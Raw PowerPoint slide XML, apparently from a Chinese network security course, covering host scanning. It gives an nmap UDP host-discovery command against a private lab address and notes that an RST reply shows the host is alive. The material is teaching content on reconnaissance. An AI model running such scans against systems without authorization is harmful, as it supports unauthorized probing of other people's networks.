              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616575" y="1075055"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.目标主机返回了一个RST包，说明目标主机是存活的，如图2-2-16所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616575" y="1720215"/>
            <a:ext cx="5276850" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616575" y="5320665"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-16 目标主机返回RST包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行UDP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1939925"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sn -PU --send-ip 192.168.172.129”命令进行UDP主机发现，如图2-2-17所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="2861945"/>
            <a:ext cx="5219700" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="文本框 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="4119245"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-17 使用_PU参数进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行UDP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
